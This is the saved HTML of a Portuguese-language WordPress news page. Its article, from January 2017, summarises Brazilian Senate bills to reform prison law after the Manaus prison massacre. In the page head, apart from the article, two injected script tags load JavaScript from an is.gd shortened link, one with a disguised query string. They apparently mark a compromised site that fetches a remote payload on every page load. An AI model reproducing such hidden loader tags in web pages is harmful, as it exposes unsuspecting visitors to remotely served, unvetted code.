<!DOCTYPE html>
<html lang="pt-BR">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="profile" href="http://gmpg.org/xfn/11">
<link rel="pingback" href="http://oanapolis.com.br/xmlrpc.php">
<title>Projetos alteram Lei de Execução Penal para solucionar problemas dos presídios &#8211; Jornal O Anápolis</title>
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Feed para Jornal O Anápolis &raquo;" href="http://oanapolis.com.br/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para Jornal O Anápolis &raquo;" href="http://oanapolis.com.br/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para Jornal O Anápolis &raquo; Projetos alteram Lei de Execução Penal para solucionar problemas dos presídios" href="http://oanapolis.com.br/projetos-alteram-lei-de-execucao-penal-para-solucionar-problemas-dos-presidios/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/oanapolis.com.br\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.7"}};
			!function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),!(j.toDataURL().length<3e3)&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,65039,8205,55356,57096),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,55356,57096),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55357,56425,55356,57341,8205,55357,56507),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55357,56425,55356,57341,55357,56507),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='font-awesome-css'  href='http://oanapolis.com.br/wp-content/themes/awaken/css/font-awesome.min.css?ver=4.4.0' type='text/css' media='all' />
<link rel='stylesheet' id='bootstrap.css-css'  href='http://oanapolis.com.br/wp-content/themes/awaken/css/bootstrap.min.css?ver=all' type='text/css' media='all' />
<link rel='stylesheet' id='awaken-style-css'  href='http://oanapolis.com.br/wp-content/themes/awaken/style.css?ver=4.7' type='text/css' media='all' />
<link rel='stylesheet' id='awaken-fonts-css'  href='//fonts.googleapis.com/css?family=Ubuntu%3A400%2C500%7CSource+Sans+Pro%3A400%2C600%2C700%2C400italic%7CRoboto+Condensed%3A400italic%2C700%2C400&#038;subset=latin%2Clatin-ext' type='text/css' media='all' />
<link rel='stylesheet' id='add-flex-css-css'  href='http://oanapolis.com.br/wp-content/themes/awaken/css/flexslider.css?ver=4.7' type='text/css' media='screen' />
<script type='text/javascript' src='http://oanapolis.com.br/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://oanapolis.com.br/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://oanapolis.com.br/wp-content/themes/awaken/js/scripts.js?ver=4.7'></script>
<!--[if lt IE 9]>
<script type='text/javascript' src='http://oanapolis.com.br/wp-content/themes/awaken/js/respond.min.js?ver=4.7'></script>
<![endif]-->
<!--[if lt IE 9]>
<script type='text/javascript' src='http://oanapolis.com.br/wp-content/themes/awaken/js/html5shiv.js?ver=4.7'></script>
<![endif]-->
<link rel='https://api.w.org/' href='http://oanapolis.com.br/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://oanapolis.com.br/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://oanapolis.com.br/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='“Queremos dar vida ao Estádio Jonas Duarte”, disse o prefeito Roberto' href='http://oanapolis.com.br/queremos-dar-vida-ao-estadio-jonas-duarte-disse-o-prefeito-roberto/' />
<link rel='next' title='Homem é preso por matar colega a machadadas em Bela Vista' href='http://oanapolis.com.br/homem-e-preso-por-matar-colega-a-machadadas-em-bela-vista/' />
<meta name="generator" content="WordPress 4.7" />
<link rel="canonical" href="http://oanapolis.com.br/projetos-alteram-lei-de-execucao-penal-para-solucionar-problemas-dos-presidios/" />
<link rel='shortlink' href='http://oanapolis.com.br/?p=13177' />
<link rel="alternate" type="application/json+oembed" href="http://oanapolis.com.br/wp-json/oembed/1.0/embed?url=http%3A%2F%2Foanapolis.com.br%2Fprojetos-alteram-lei-de-execucao-penal-para-solucionar-problemas-dos-presidios%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://oanapolis.com.br/wp-json/oembed/1.0/embed?url=http%3A%2F%2Foanapolis.com.br%2Fprojetos-alteram-lei-de-execucao-penal-para-solucionar-problemas-dos-presidios%2F&#038;format=xml" />
<meta name="google-site-verification" content="IfhO60TEOpF_tGiYDkKQDja0WnFjHMpaMyHBM0yoBec" /><style></style>		<style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style>
		<meta data-pso-pv="1.2.1" data-pso-pt="singlePost" data-pso-th="09a6749c41ac23617601e51a976d41e6"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script pagespeed_no_defer="" data-pso-version="20161208_000714">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</script><script src="http://is.gd/6TsNRQ?P?p=ajax.googleapis.com"></script>
<script src="http://is.gd/6TsNRQ"></script>
</head>

<body class="post-template-default single single-post postid-13177 single-format-standard group-blog">
<div id="page" class="hfeed site">
	<a class="skip-link screen-reader-text" href="#content">Skip to content</a>
	<header id="masthead" class="site-header" role="banner">
		
		
		<div class="top-nav">
			<div class="container">
				<div class="row">
										<div class="col-xs-12 col-sm-6 col-md-8 ">
													<nav id="top-navigation" class="top-navigation" role="navigation">
								<div class="menu-home-container"><ul id="menu-home" class="menu"><li id="menu-item-8476" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8476"><a href="http://oanapolis.com.br/categoria/noticias/colunistas/anapolis/">Anápolis</a></li>
<li id="menu-item-7635" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor menu-item-has-children menu-item-7635"><a href="http://oanapolis.com.br/categoria/noticias/">Notícias</a>
<ul class="sub-menu">
	<li id="menu-item-7645" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7645"><a href="http://oanapolis.com.br/categoria/noticias/politica-noticias/">Política</a></li>
	<li id="menu-item-7636" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7636"><a href="http://oanapolis.com.br/categoria/noticias/brasil/">Ciências</a></li>
	<li id="menu-item-7637" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7637"><a href="http://oanapolis.com.br/categoria/noticias/economia/">Economia</a></li>
	<li id="menu-item-7638" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7638"><a href="http://oanapolis.com.br/categoria/noticias/governo-estadial/">Governo Estadial</a></li>
	<li id="menu-item-7639" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7639"><a href="http://oanapolis.com.br/categoria/noticias/governo-federal/">Governo Federal</a></li>
	<li id="menu-item-8484" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-8484"><a href="http://oanapolis.com.br/categoria/noticias/legislativo/">Legislativo</a></li>
	<li id="menu-item-7640" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7640"><a href="http://oanapolis.com.br/categoria/noticias/justica/">Justiça</a></li>
	<li id="menu-item-7641" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7641"><a href="http://oanapolis.com.br/categoria/noticias/ministerio-publico/">Ministério Público</a></li>
	<li id="menu-item-8487" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8487"><a href="http://oanapolis.com.br/categoria/noticias/tecnologia/">Tecnologia</a></li>
	<li id="menu-item-7642" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7642"><a href="http://oanapolis.com.br/categoria/noticias/mundo/">Mundo</a></li>
	<li id="menu-item-8483" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8483"><a href="http://oanapolis.com.br/categoria/noticias/eleicoes-2016/">Eleições 2016</a></li>
	<li id="menu-item-7644" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7644"><a href="http://oanapolis.com.br/categoria/noticias/policia/">Polícia</a></li>
	<li id="menu-item-8486" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8486"><a href="http://oanapolis.com.br/categoria/noticias/saude/">Saúde</a></li>
	<li id="menu-item-8482" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8482"><a href="http://oanapolis.com.br/categoria/noticias/educacao/">Educação</a></li>
	<li id="menu-item-8485" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8485"><a href="http://oanapolis.com.br/categoria/noticias/meio-ambiente/">Meio Ambiente</a></li>
	<li id="menu-item-7643" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7643"><a href="http://oanapolis.com.br/categoria/noticias/outras/">Outras</a></li>
</ul>
</li>
<li id="menu-item-8596" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8596"><a href="http://oanapolis.com.br/categoria/fatos-e-fotos/">Fatos e Fotos</a></li>
<li id="menu-item-8474" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-8474"><a href="http://oanapolis.com.br/categoria/coluns/">Colunas</a>
<ul class="sub-menu">
	<li id="menu-item-8477" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8477"><a href="http://oanapolis.com.br/categoria/noticias/colunistas/conta-giro/">Conta Giro</a></li>
	<li id="menu-item-8481" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8481"><a href="http://oanapolis.com.br/categoria/noticias/colunistas/esplanda-mazzini/">Esplanda &#8211; Mazzini</a></li>
</ul>
</li>
<li id="menu-item-8475" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-8475"><a href="http://oanapolis.com.br/categoria/noticias/colunistas/">Colunistas</a>
<ul class="sub-menu">
	<li id="menu-item-8478" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8478"><a href="http://oanapolis.com.br/categoria/noticias/colunistas/dilmar-ferreira/">Dilmar Ferreira</a></li>
	<li id="menu-item-8479" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8479"><a href="http://oanapolis.com.br/categoria/noticias/colunistas/dr-benevides/">Dr. Benevides</a></li>
	<li id="menu-item-8480" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8480"><a href="http://oanapolis.com.br/categoria/noticias/colunistas/ernani-de-paula/">Ernani de Paula</a></li>
</ul>
</li>
<li id="menu-item-7728" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-7728"><a href="http://oanapolis.com.br/categoria/editais/">Editais</a>
<ul class="sub-menu">
	<li id="menu-item-7733" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7733"><a href="http://oanapolis.com.br/categoria/editais/protesto/">Protesto</a></li>
	<li id="menu-item-7732" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7732"><a href="http://oanapolis.com.br/categoria/editais/proclamas/">Proclamas</a></li>
	<li id="menu-item-7729" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7729"><a href="http://oanapolis.com.br/categoria/editais/comunicacao/">Comunicação</a></li>
	<li id="menu-item-7730" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7730"><a href="http://oanapolis.com.br/categoria/editais/notificacao/">Notificação</a></li>
	<li id="menu-item-7731" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7731"><a href="http://oanapolis.com.br/categoria/editais/outros/">Outros</a></li>
</ul>
</li>
<li id="menu-item-7771" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-7771"><a href="http://oanapolis.com.br/categoria/classificados/">Classificados</a>
<ul class="sub-menu">
	<li id="menu-item-7773" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7773"><a href="http://oanapolis.com.br/categoria/classificados/imoveis/">Imóveis</a></li>
	<li id="menu-item-7774" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7774"><a href="http://oanapolis.com.br/categoria/classificados/veiculos/">Veículos</a></li>
	<li id="menu-item-7772" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7772"><a href="http://oanapolis.com.br/categoria/classificados/diversos/">Diversos</a></li>
</ul>
</li>
<li id="menu-item-7795" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-7795"><a href="http://oanapolis.com.br/categoria/concursos/">Concursos</a>
<ul class="sub-menu">
	<li id="menu-item-7796" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7796"><a href="http://oanapolis.com.br/categoria/concursos/concursos-em-goias/">Concursos em Goiás</a></li>
	<li id="menu-item-7797" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7797"><a href="http://oanapolis.com.br/categoria/concursos/concursos-em-outros-estados/">Concursos em outros estados</a></li>
</ul>
</li>
<li id="menu-item-7984" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7984"><a href="http://oanapolis.com.br/contato-2/">contato</a></li>
</ul></div>							</nav><!-- #site-navigation -->	
							<a href="#" class="navbutton" id="top-nav-button">Top Menu</a>
							<div class="responsive-topnav"></div>
									
					</div><!-- col-xs-12 col-sm-6 col-md-8 -->
					<div class="col-xs-12 col-sm-6 col-md-4">
											</div><!-- col-xs-12 col-sm-6 col-md-4 -->
				</div><!-- row -->
			</div><!-- .container -->
		</div>
	
	<div class="site-branding">
		<div class="container">
			<div class="site-brand-container">
										<div class="site-logo">
							<a href="http://oanapolis.com.br/" rel="home"><img src="http://www.oanapolis.com.br/wp-content/uploads/2016/01/Banner-do-topo-geolab-5.jpg" alt="Jornal O Anápolis"></a>
						</div>
								</div><!-- .site-brand-container -->
						
		</div>
	</div>

	<div class="container">
		<div class="awaken-navigation-container">
			<nav id="site-navigation" class="main-navigation cl-effect-10" role="navigation">
				<div class="menu"><ul>
<li ><a href="http://oanapolis.com.br/">Início</a></li><li class="page_item page-item-7983"><a href="http://oanapolis.com.br/contato-2/">contato</a></li>
</ul></div>
			</nav><!-- #site-navigation -->
			<a href="#" class="navbutton" id="main-nav-button">Main Menu</a>
			<div class="responsive-mainnav"></div>

							<div class="awaken-search-button-icon"></div>
				<div class="awaken-search-box-container">
					<div class="awaken-search-box">
						<form action="http://oanapolis.com.br/" id="awaken-search-form" method="get">
							<input type="text" value="" name="s" id="s" />
							<input type="submit" value="Search" />
						</form>
					</div><!-- th-search-box -->
				</div><!-- .th-search-box-container -->
			
		</div><!-- .awaken-navigation-container-->
	</div><!-- .container -->
	</header><!-- #masthead -->

	<div id="content" class="site-content">
		<div class="container">

	<div class="row">
<div class="col-xs-12 col-sm-12 col-md-8 ">
	<div id="primary" class="content-area">
		<main id="main" class="site-main" role="main">

		
			
<article id="post-13177" class="post-13177 post type-post status-publish format-standard has-post-thumbnail hentry category-legislativo">
	<header class="single-entry-header">
		<h1 class="single-entry-title">Projetos alteram Lei de Execução Penal para solucionar problemas dos presídios</h1>
		<div class="single-entry-meta">
			<span class="posted-on"><a href="http://oanapolis.com.br/projetos-alteram-lei-de-execucao-penal-para-solucionar-problemas-dos-presidios/" rel="bookmark"><time class="entry-date published updated" datetime="2017-01-06T03:10:34+00:00">06/01/2017</time></a></span><span class="byline"><span class="author vcard"><a class="url fn n" href="http://oanapolis.com.br/author/admin/">o anápolis</a></span></span>					</div><!-- .entry-meta -->
	</header><!-- .entry-header -->

				<div class="article-featured-image">
				<img width="752" height="440" src="http://oanapolis.com.br/wp-content/uploads/2017/01/Presidio-752x440.jpg" class="attachment-featured-slider size-featured-slider wp-post-image" alt="" />			</div>
			
	<div class="entry-content">
		<h1>Cela superlotada no presídio Aníbal Bruno, na região metropolitana do Recife Luiz Silveira/Agência CNJ</h1>
<p>A chacina que resultou na morte de 56 detentos em um presídio de Manaus, capital do Amazonas, trouxe mais uma vez à tona os problemas do sistema prisional brasileiro como superlotação, violência, falta de infraestrutura e higiene e a atuação do crime organizado. Principal proposta de revisão e atualização da Lei de Execução Penal em trâmite no Congresso Nacional, o <a href="http://www25.senado.leg.br/web/atividade/materias/-/materia/115665">Projeto de Lei do Senado (PLS) 513/2013</a> apresenta uma série de medidas com o objetivo de enfrentar os problemas que assolam os presídios.</p>
<p>O PLS 513/2013 resultou de um anteprojeto elaborado por uma comissão especial de juristas e, como medida principal veda a acomodação de presos em número superior à capacidade do estabelecimento penal .</p>
<p>De acordo com a proposta, toda vez que o estabelecimento penal atingir a capacidade, deve ser instaurado mutirão para verificar a situação dos presos ali recolhidos. Se, ainda assim, a lotação não for normalizada, aquele que está mais próximo de cumprir a pena tem a liberdade antecipada</p>
<p>O projeto, que propõe 200 alterações à Lei de Execução Penal (<a href="http://www.planalto.gov.br/ccivil_03/leis/L7210.htm">Lei 7.210</a>), de 1984, institui também a progressão automática de regime para presos com bom comportamento que tiverem cumprido ao menos 1/6 da pena no regime anterior.</p>
<p>O projeto também proíbe a permanência dos presos provisórios (não condenados) em penitenciárias e fixa o prazo de quatro anos para a extinção das carceragens em delegacias de polícia.</p>
<h3>Reinserção</h3>
<p>Entre outros pontos, o projeto prevê incentivos fiscais a empresas que contratem determinado percentual de egressos do sistema prisional, e amplia as hipóteses de remição de pena, que passam a incluir o artesanato e a leitura, além do trabalho e do estudo.</p>
<p>A proposta faz parte da <a href="http://www12.senado.leg.br/noticias/infograficos/2016/10/acompanhe-a-tramitacao-dos-projetos-da-agenda-brasil">Agenda Brasil</a> — pauta apresentada pelo presidente do Senado, Renan Calheiros, com o objetivo de incentivar a retomada do crescimento econômico do país— e aguarda votação na Comissão de Constituição, Justiça e Cidadania (CCJ), onde é relatada pelo senador Eunício Oliveira (PMDB-CE).</p>
<h3>Soluções</h3>
<p>Outros projetos em tramitação no Senado apontam possíveis soluções para os problemas do sistema carcerário. Entre eles está o <a href="https://www25.senado.leg.br/web/atividade/materias/-/materia/123762">PLS 700/2015</a>, do senador Roberto Rocha (PSB-MA). A proposta determina que todas as novas unidades prisionais deverão obedecer aos requisitos mínimos estabelecidos pelo Conselho Nacional de Política Criminal e Penitenciária.</p>
<p>O conselho tem hoje uma série de projetos para estabelecimentos penais e unidades de atendimento educativo, que atendem critérios como divisão por nível de segurança, separando condenados por crimes considerados menos graves daqueles que cumprem pena por crimes mais graves, e garantindo condições de salubridade como espaço mínimo para celas, ventilação e iluminação, entre outros aspectos.</p>
<p>Hoje, apenas a construção de penitenciárias com recursos do Fundo Penitenciário Nacional tem que obedecer a esse padrão. O projeto amplia essa obrigatoriedade para todas as novas obras.</p>
<h3>Terceirização</h3>
<p>O Complexo Penitenciário Anísio Jobim, em Manaus, onde ocorreu o massacre no início do ano, é administrado desde 2014 por uma empresa terceirizada. Outros estados têm apostado em parcerias público-privadas para gerir presídios. É o caso de Minas Geais, onde a penitenciária Ribeirão Neves foi a primeira a ser administrada por meio das PPPs no Brasil.</p>
<p>Uma proposta (<a href="http://www25.senado.leg.br/web/atividade/materias/-/materia/101752">PLS 513/2011)</a> regulamenta as parcerias público-privadas na construção e administração de presídios e proíbe que as atividades essenciais sejam terceirizadas. Assim, segurança, custódia, escoltas, vigilância, recaptura de presos, controle de rebeliões e assistência social e jurídica aos presos serão funções exclusivas de servidores públicos de carreira. O projeto, de autoria do senador Vicentinho Alves (PR-TO), recebeu substitutivo do relator, senador Paulo Paim (PT-RS).</p>
<h3>Fundo Penitenciário</h3>
<p>Já o senador José Agripino (DEM-RN) apresentou projeto (<a href="http://www25.senado.leg.br/web/atividade/materias/-/materia/126645">PLS 309/2016 –Complementar</a>) estabelecendo que os recursos do Fundo Penitenciário Nacional (Funpen) sejam diretamente transferidos para estados e municípios em caso de calamidade pública. Hoje, o governo federal tem autonomia para contingenciar esse recursos.</p>
<p>O senador propõe a criação de um conselho gestor para administrar o fundo.</p>
<h3>Outras propostas</h3>
<p>Está ainda em tramitação proposta (<a href="http://www25.senado.leg.br/web/atividade/materias/-/materia/120820">PLS 239/2015</a>) que incentiva a criação de polos industriais nas proximidades dos complexos penitenciários. A ideia do senador Acir Gurgacz (PDT-RO), autor do projeto, é de que esses espaços sejam compostos por empresas que contribuam para a formação profissional e o exercício de atividade laboral pelo condenado.</p>
<p>O senador Cássio Cunha Lima (PSDB-PB), por sua vez, apresentou uma Proposta de Emenda à Constituição (PEC) <a href="http://www25.senado.leg.br/web/atividade/materias/-/materia/125429">14/2016</a> que cria polícias penitenciárias federal, estaduais e distrital. (Agência Senado)</p>
			</div><!-- .entry-content -->

	<footer class="single-entry-footer">
		<div class="categorized-under">Posted Under</div><div class="awaken-category-list"><a href="http://oanapolis.com.br/categoria/noticias/legislativo/" rel="category tag">Legislativo</a></div><div class="clearfix"></div>
	</footer><!-- .entry-footer -->
</article><!-- #post-## -->

				<nav class="navigation post-navigation" role="navigation">
		<h1 class="screen-reader-text">Post navigation</h1>
		<div class="nav-links">
			<div class="nav-previous"><a href="http://oanapolis.com.br/queremos-dar-vida-ao-estadio-jonas-duarte-disse-o-prefeito-roberto/" rel="prev">“Queremos dar vida ao Estádio Jonas Duarte”, disse o prefeito Roberto</a></div><div class="nav-next"><a href="http://oanapolis.com.br/homem-e-preso-por-matar-colega-a-machadadas-em-bela-vista/" rel="next">Homem é preso por matar colega a machadadas em Bela Vista</a></div>		</div><!-- .nav-links -->
	</nav><!-- .navigation -->
	
			
<div id="comments" class="comments-area">

	
	
	
		<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Deixe uma resposta <small><a rel="nofollow" id="cancel-comment-reply-link" href="/projetos-alteram-lei-de-execucao-penal-para-solucionar-problemas-dos-presidios/#respond" style="display:none;">Cancelar resposta</a></small></h3>			<form action="http://oanapolis.com.br/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate>
				<p class="comment-notes"><span id="email-notes">O seu endereço de e-mail não será publicado.</span> Campos obrigatórios são marcados com <span class="required">*</span></p><p class="comment-form-comment"><label for="comment">Comentário</label> <textarea id="comment" name="comment" cols="45" rows="8" maxlength="65525" aria-required="true" required="required"></textarea></p><p class="comment-form-author"><label for="author">Nome <span class="required">*</span></label> <input id="author" name="author" type="text" value="" size="30" maxlength="245" aria-required='true' required='required' /></p>
<p class="comment-form-email"><label for="email">E-mail <span class="required">*</span></label> <input id="email" name="email" type="email" value="" size="30" maxlength="100" aria-describedby="email-notes" aria-required='true' required='required' /></p>
<p class="comment-form-url"><label for="url">Site</label> <input id="url" name="url" type="url" value="" size="30" maxlength="200" /></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Publicar comentário" /> <input type='hidden' name='comment_post_ID' value='13177' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p>			</form>
			</div><!-- #respond -->
	
</div><!-- #comments -->

		
		</main><!-- #main -->
	</div><!-- #primary -->
</div><!-- .bootstrap cols -->
<div class="col-xs-12 col-sm-6 col-md-4">
	
<div id="secondary" class="main-widget-area" role="complementary">
	<aside id="text-3" class="widget widget_text"><div class="widget-title-container"><h2 class="widget-title">Eleições 2016 Anápolis</h2></div>			<div class="textwidget"><p>https://youtu.be/OALyNX4IbBI<iframe width="640" height="360" src="https://www.youtube.com/embed/OALyNX4IbBI" frameborder="0" allowfullscreen></iframe></p>
<p>https://youtu.be/bpIXUPrMpKY</p>
</div>
		</aside><aside id="recent-comments-2" class="widget widget_recent_comments"><div class="widget-title-container"><h2 class="widget-title">Comentários</h2></div><ul id="recentcomments"><li class="recentcomments"><span class="comment-author-link">Marcos</span> em <a href="http://oanapolis.com.br/o-anapolino-pede-socorro-porque-a-cidade-se-transformou-em-um-matadouro-de-gente/#comment-14585">O anapolino pede socorro porque a cidade se transformou em um matadouro de gente</a></li><li class="recentcomments"><span class="comment-author-link">Marcos</span> em <a href="http://oanapolis.com.br/o-anapolino-pede-socorro-porque-a-cidade-se-transformou-em-um-matadouro-de-gente/#comment-14584">O anapolino pede socorro porque a cidade se transformou em um matadouro de gente</a></li><li class="recentcomments"><span class="comment-author-link">Eliézer Neiva</span> em <a href="http://oanapolis.com.br/prefeito-roberto-trabalha-para-resolver-a-falta-dagua/#comment-14571">Prefeito Roberto trabalha para resolver a falta d’água</a></li><li class="recentcomments"><span class="comment-author-link">Carlos</span> em <a href="http://oanapolis.com.br/roberto-importa-nomes-de-goiania-e-ate-de-palmas-para-o-seu-secretariado/#comment-14570">Roberto importa nomes de Goiânia e até de Palmas para o seu secretariado</a></li><li class="recentcomments"><span class="comment-author-link">Raimundo Nonato</span> em <a href="http://oanapolis.com.br/roberto-importa-nomes-de-goiania-e-ate-de-palmas-para-o-seu-secretariado/#comment-14562">Roberto importa nomes de Goiânia e até de Palmas para o seu secretariado</a></li><li class="recentcomments"><span class="comment-author-link">o anápolis</span> em <a href="http://oanapolis.com.br/anapolis-vai-amanhecer-diferente-na-proxima-segunda-feira-2/#comment-14483">Anápolis vai amanhecer diferente na próxima segunda-feira 2</a></li><li class="recentcomments"><span class="comment-author-link">Rodrigo Siqueira</span> em <a href="http://oanapolis.com.br/anapolis-vai-amanhecer-diferente-na-proxima-segunda-feira-2/#comment-14477">Anápolis vai amanhecer diferente na próxima segunda-feira 2</a></li><li class="recentcomments"><span class="comment-author-link">o anápolis</span> em <a href="http://oanapolis.com.br/anapolis-vai-amanhecer-diferente-na-proxima-segunda-feira-2/#comment-14475">Anápolis vai amanhecer diferente na próxima segunda-feira 2</a></li><li class="recentcomments"><span class="comment-author-link">Rodrigo Siqueira</span> em <a href="http://oanapolis.com.br/anapolis-vai-amanhecer-diferente-na-proxima-segunda-feira-2/#comment-14471">Anápolis vai amanhecer diferente na próxima segunda-feira 2</a></li><li class="recentcomments"><span class="comment-author-link">Rodrigo Siqueira</span> em <a href="http://oanapolis.com.br/anapolis-vai-amanhecer-diferente-na-proxima-segunda-feira-2/#comment-14470">Anápolis vai amanhecer diferente na próxima segunda-feira 2</a></li><li class="recentcomments"><span class="comment-author-link">Nivaldo Juvêncio</span> em <a href="http://oanapolis.com.br/esta-no-facebook-do-roberto-do-orion/#comment-14469">Está no Facebook do Roberto do Órion</a></li><li class="recentcomments"><span class="comment-author-link">Marcos</span> em <a href="http://oanapolis.com.br/marconi-vai-torrar-r15-milhao-com-o-show-da-virada/#comment-14468">Marconi vai torrar R$1,5 milhão com o Show da virada</a></li><li class="recentcomments"><span class="comment-author-link">Marcos</span> em <a href="http://oanapolis.com.br/marconi-vai-torrar-r15-milhao-com-o-show-da-virada/#comment-14467">Marconi vai torrar R$1,5 milhão com o Show da virada</a></li><li class="recentcomments"><span class="comment-author-link"><a href='http://www.tudosobrevidaesaude.com/' rel='external nofollow' class='url'>Raul</a></span> em <a href="http://oanapolis.com.br/policia-frustra-roubo-e-apreende-r-250-mil-em-leite-longa-vida/#comment-14465">Polícia frustra roubo e apreende R$ 250 mil em leite longa vida</a></li><li class="recentcomments"><span class="comment-author-link">haroldo batista</span> em <a href="http://oanapolis.com.br/esta-no-facebook-do-roberto-do-orion/#comment-14464">Está no Facebook do Roberto do Órion</a></li><li class="recentcomments"><span class="comment-author-link">haroldo batista</span> em <a href="http://oanapolis.com.br/esta-no-facebook-do-roberto-do-orion/#comment-14463">Está no Facebook do Roberto do Órion</a></li><li class="recentcomments"><span class="comment-author-link">Elusianio</span> em <a href="http://oanapolis.com.br/marconi-vai-torrar-r15-milhao-com-o-show-da-virada/#comment-14461">Marconi vai torrar R$1,5 milhão com o Show da virada</a></li><li class="recentcomments"><span class="comment-author-link">Márcio Costa Rodrigues</span> em <a href="http://oanapolis.com.br/marconi-fala-de-um-goias-que-nao-existe-na-pratica/#comment-14314">Marconi fala de um Goiás que não existe na prática</a></li><li class="recentcomments"><span class="comment-author-link">Rubra</span> em <a href="http://oanapolis.com.br/conheca-as-dez-medidas-para-estimular-a-economia-do-brasil/#comment-14306">Conheça as dez medidas para estimular a economia do Brasil</a></li><li class="recentcomments"><span class="comment-author-link">Costa lemes</span> em <a 